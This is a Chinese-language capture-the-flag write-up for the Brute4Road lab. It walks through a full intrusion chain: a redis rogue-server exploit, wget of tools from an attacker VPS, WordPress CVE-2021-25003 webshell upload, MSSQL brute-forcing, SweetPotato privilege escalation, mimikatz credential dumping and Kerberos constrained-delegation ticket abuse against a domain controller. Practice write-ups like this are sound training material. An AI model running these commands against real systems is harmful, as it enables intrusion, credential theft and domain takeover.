靶场练习
春秋云镜-Brute4Road
flag01
fscan开扫
1 | start infoscan |
发现redis未授权。尝试过后发现能打redis主从复制。环境好容易崩,心累。
1 | python3 redis-rogue-server.py --rhost 47.92.212.201 --lhost 156.238.233.55 |
反弹上去后发现存在suid权限的命令。(发现ip变了是正常的,因为环境总打坏掉,所以开了很多次靶机。
1 | base64 '/home/redis/flag/flag01' |
flag01: flag{7da2e394-ecd8-49a5-b29e-35f03d0e6a3f}
flag02
查看网络连接状况发现内网网段
1 | netstat -ano |
ip懒得遮了。
在vps上开个web服务,受害主机下载fscan,以及代理软件
1 | python3 -m http.server 2333 |
1 | wget http://156.238.55:2333/fscan |
1 | ./fscan -h 172.22.2.7/24 -o fffffilm.txt |
扫描结果
1 | 172.22.2.3:88 open |
整理一下目标与思路
1 | 172.22.2.7 完成 |
发现一个wordpress,先wpscan扫一下
1 | proxychains wpscan --url http://172.22.2.18 |
扫出来一个这个
利用WordPress WPCargo Track CVE-2021-25003写木马
官方POC
1 | import sys |
成功执行命令。
1 | proxychains python3 poc.py |
蚁剑连一下。
发现了数据库配置信息。
数据库里面找到flag02
flag02:flag{c757e423-eb44-459c-9c63-7625009910d8}
flag03
数据库里面发现大量密码
导出为一个字典。MSSQLSERVER的1433端口是开发的,我们对它进行爆破。
1 | .\fscan -h 172.22.16 -m mssql -pwdf password.txt -userf user.txt |
用mdut拿到低权限。
土豆提权。
1 | C:/Users/Public/SweetPotato.exe -a "whoami" |
加个用户进去
1 | net user fffffilm Password@973 /add |
远程连接读取flag
flag03: flag{86d41af7-8da6-4905-bda8-06c06dca3a90}
flag04
发现域环境
本来想上一个BloodHound收集信息的,但是一开始下的版本有点问题,跑不出结果,后来想尝试的时候。环境又出问题了,再打一遍好累啊,等下一次有好一点的环境再尝试吧。这里偷了两张hony师傅的图
MSSQLSERVER.XIAORANG.LAB 具有对计算机 DC.XIAORANG.LAB 的约束委派权限
抓取哈希
1 | privilege::debug |
找到这个
1 | msv : |
一开始想用Rubeus打的,但是跑的时候说.net版本不对,就直接换了一个方法了。
1 | .\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:cea3e66a2715c71423e7d3f0ff6cd352 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt |
法二
用mimikatz导出MSSQLSERVER的票据
1 | privilege::debug |
接着用kekeo请求服务票据
1 | tgs::s4u /tgt:[0;3e4]-2-1-40e10000-MSSQLSERVER$@krbtgt-XIAORANG.LAB.kirbi /user:Administrator@XIAORANG.LAB /service:cifs/DC.XIAORANG.LAB |
打ptt票据传递
1 | mimikatz.exe "kerberos::ptt TGS_Administrator@XIAORANG.LAB@XIAORANG.LAB_cifs~DC.XIAORANG.LAB@XIAORANG.LAB.kirbi" "exit" |
读取flag
1 | type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt |
flag04: flag{fe128b9c-f5ab-4fab-8629-676341a5d925}